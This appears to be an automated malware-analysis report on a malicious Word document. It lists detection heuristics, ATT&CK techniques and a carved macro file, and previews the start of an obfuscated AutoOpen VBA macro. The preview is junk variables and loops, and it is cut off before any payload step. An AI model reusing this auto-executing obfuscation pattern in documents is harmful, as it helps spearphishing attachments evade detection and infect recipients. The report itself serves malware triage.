Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a VBA macro that runs automatically through the AutoOpen procedure. Heuristics indicate the macro calls GetObject, a common technique for executing code. The macro's obfuscated nature and the presence of an embedded VBA macro suggest it is designed to download and execute a secondary payload, consistent with a spearphishing attachment attack vector.
Heuristics (7)

- ClamAV: Doc.Malware.Generic-6667835-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6667835-0
- VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 82f74d5fb3d8c5c52a81f518c86f3d9a79c61f0094f0d854d04b3ec4e9f82910) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14529 bytes |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
ryjeqovkgi = "varusorijyv" & Val("3718 varusorijyv")
pecoguiw = "xaedp" & Val("25367 xaedp")
vuxcikigerej = IIf(48382 > 48382, "zolyaaseautyf", "zolyaaseautyfzolyaaseautyf")
aolokavarytwyg = 23757 - 10
While aolokavarytwyg < 23757
'zaiicezzaiicez
aolokavarytwyg = aolokavarytwyg + 1
Wend
aonybugubuz = Array("guegiias", "xzolopivu", "iuxeiylezecyg", "nufevy", "kjuihogucac")
duhoguvysloi = "hezas" & Val("13785 hezas")
fyiybiuraaiq = LBound(Array("zbuhiaezicyan", "qaaeqersapibi", "runwsytumudy", "iiiykxyidi"))
ketytuceuri = CDate(21870)
tykavojat = 59720 - 10
While tykavojat < 59720
'jacitixadjacitixad
tykavojat = tykavojat + 1
Wend
saiufago = CDate(31870)
On Error Resume Next
qedecadiduhy = InStr("qosgafofuzty", "qosgafofuzty")
qefemicepala = 13810 - 10
While qefemicepala < 13810
'siakuwosiakuwo
qefemicepala = qefemicepala + 1
Wend
zyhioez = Array("keph", "ritcawyfyneiag", "gejeaofaqimen", "goneqikydemakov", "qilisf")
fmitteyiaxi = "zafys"
pzebefboi = CDate(92701)
wizydwagifim = InStr("jvetyvi", "jvetyvi")
sekitajonubip = "goaponiruxi"
fubelurj = "dutacyfavomeqow" & Val("95969 dutacyfavomeqow")
pitupipkferop = CDate(1386)
neiecevaci = InStr("ziwebudosyg", "ziwebudosyg")
'kubagty45934 kubagty
bpudarymul = "mikadypimeh"
koaabharc = IIf(30160 > 30160, "xojyvuhomies", "xojyvuhomiesxojyvuhomies")
laqvyvihaxas = LBound(Array("iiwivakcle", "iiryx", "gyteeqexu", "muvajyg", "gijobokimva"))
arofiz = "xxux" & Val("71198 xxux")
iowynaiof = "xuwqexyvunu" & Val("9365 xuwqexyvunu")
ninoranovohepc = "ruunuqyzuak"
fesog = "megil" & Val("18026 megil")
dogpykaz = "covunetuwys"
fawypixectok = IIf(39038 > 39038, "aoguzeiernisiw", "aoguzeiernisiwaoguzeiernisiw")
folodahuiqe = 70156 - 10
vepig = InStr("waqiwia", "waqiwia")
'tujdapy22596 tujdapy
While folodahuiqe < 70156
'anussywypuanussywypu
riwicas = CDate(3926)
folodahuiqe = folodahuiqe + 1
Wend
kxutyfageliqok = CDate(87667)
vufezajriz = "bahuresytc"
guzaz = Array("puqudlawycpap", "cyzizusz", "bubijo")
nykovic = Array("xificux", "fosenifyzusewar", "kuzaa")
imyrikhe = IIf(51635 > 51635, "qiterof", "qiterofqiterof")
xukaa = "gekewatuqa"
suqojyd = InStr("heiace", "heiace")
vuxujolyseluru = 64266 - 10
While vuxujolyseluru < 64266
'supebaosupebao
vuxujolyseluru = vuxujolyseluru + 1
Wend
pofigigeboi = LBound(Array("kuauwagybu", "tabulohyzesa", "doxawaxufara", "taaijaaahicicu"))
'hocemadi29477 hocemadi
rypavipgoh = IIf(71156 > 71156, "fynimomeb", "fynimomebfynimomeb")
iihojesuhypobu = CDate(73137)
genunoaipusom = 48303 - 10
While genunoaipusom < 48303
'cukmuhozisucukmuhozisu
genunoaipusom = genunoaipusom + 1
Wend
rapewawedeziv = ""
jcot = 12413 - 10
While jcot < 12413
'iaqoqedysewaoiaqoqedysewao
jcot = jcot + 1
Wend
gewyloiuk = "cybjzuvalitiw" & Val("88774 cybjzuvalitiw")
wybyl = LBound(Array("aesuwemacyxonuq", "wiwokumag", "aahomyvoso", "damylx", "dnyiefu", "milogotygixy"))
'uobid56982 uobid
'nyiired46086 nyiired
yzulotyieb = IIf(73887 > 73887, "ayiideduiiw", "ayiideduiiwayiideduiiw")
wiaanabyk = Array("iijipkiuxef", "xijb", "senoviwya", "hybep", "vabigeav")
gpuz = "xiluk"
fobjodxugehuj = "peziie" & Val("13209 peziie")
pozydyb = 64287 - 10
While pozydyb < 64287
'uvoninaaimmasuvoninaaimmas
pozydyb = pozydyb + 1
Wend
lujtyhyxy = InStr("wykipivota", "wykipivota")
riafutaayiuius = InStr("kausykadula", "kausykadula")
rtei = Array("saitili", "widdahanahuh", "hihufo", "viginonyfogak")
zedb = "eiony"
fiufema = "aocumiajotai" & Val("3871 aocumiajotai")
fmaba = "gehapiguhasa"
titiv = CDate(93335)
penifyf = InStr("sinixsufixilew", "sinixsufixilew")
'peacatyiu58162 peacatyiu
aepep = 19325 - 10
While aepep < 19325
'nabuiotnabuiot
aepep = aepep + 1
Wend
hyzigumeiupa = IIf(17880 >
... (truncated)